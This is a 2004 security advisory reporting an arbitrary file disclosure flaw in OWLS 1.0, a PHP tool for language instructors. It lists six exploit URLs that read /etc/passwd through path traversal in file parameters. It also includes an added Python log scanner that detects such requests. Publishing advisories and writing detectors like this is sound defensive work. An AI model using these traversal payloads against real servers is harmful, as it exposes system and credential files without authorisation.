[UNIX] OWLS Remote Arbitrary Files Disclosure
From: SecuriTeam (support_at_securiteam.com)
Date: 02/18/04
To: list@securiteam.com
Date: 18 Feb 2004 16:28:25 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
OWLS Remote Arbitrary Files Disclosure
------------------------------------------------------------------------
SUMMARY
"OWLS <http://www.foolsworkshop.com/owls/> is a web-based environment for
instructors of language to easily create exercises, readings, glossaries,
and present media for their students. Once installed on a web server that
supports PHP, instructors can create materials or upload media for
presentation to their students through a simple form based interface". A
vulnerability in the product allows remote attackers to disclose files
that would otherwise be inaccessible.
DETAILS
Vulnerable Systems:
* OWLS version 1.0
A vulnerability in the current version of OWLS allows an attacker to
retrieve arbitrary files from the web server, with the privileges of the
web server process.
Exploit:
Any of the following URLs can be used to test your system for the
mentioned vulnerability:
http://address/owls/glossaries/index.php?file=/etc/passwd
http://address/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print
http://address/owls/readings/index.php?filename=/etc/passwd
http://address/owls/multiplechoice/resultsignore.php?filename=/etc/passwd
http://address/owls/workshop/glossary.php?editfile=../../../../../../../../../../../../../../../etc/passwd
http://address/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd
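To check whether requests of this shape have already reached a server, the following added example (not part of the original advisory) scans access-log lines for requests under /owls/ whose file, filename or editfile parameter carries an absolute path or a ".." segment. The combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameters the advisory shows being used to name a file on disk.
FILE_PARAMS = {"file", "filename", "editfile"}
# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return [(param, value)] for OWLS file parameters that point outside the app."""
    parts = urlsplit(target)
    if "/owls/" not in parts.path.lower():
        return []
    hits = []
    # parse_qsl percent-decodes once; unquote again to catch double encoding.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() not in FILE_PARAMS:
            continue
        decoded = unquote(value).replace("\\", "/")
        if decoded.startswith("/") or ".." in decoded.split("/"):
            hits.append((name, decoded))
    return hits

def scan(log_lines):
    """Yield (line_number, param, decoded_value) for each flagged request."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for name, value in suspicious_params(match.group(1)):
            yield number, name, value

# Constructed sample log lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Feb/2004:16:30:01 +0200] '
    '"GET /owls/glossaries/index.php?file=/etc/passwd HTTP/1.0" 200 1432',
    '192.0.2.10 - - [18/Feb/2004:16:30:05 +0200] '
    '"GET /owls/workshop/glossary.php?editfile=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0" 200 1432',
    '198.51.100.7 - - [18/Feb/2004:16:31:12 +0200] '
    '"GET /owls/readings/index.php?filename=lesson1.txt HTTP/1.0" 200 5120',
    '198.51.100.7 - - [18/Feb/2004:16:31:40 +0200] '
    '"GET /index.php?file=/etc/passwd HTTP/1.0" 404 209',
]

if __name__ == "__main__":
    for number, name, value in scan(SAMPLE_LOG):
        print(f"line {number}: {name}={value}")
```

Parameters sent in a POST body do not appear in the access log, so a clean scan does not rule out such requests.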
ADDITIONAL INFORMATION
The information has been provided by <mailto:g00db0y@zone-h.org> G00db0y
from Zone-h Security Labs.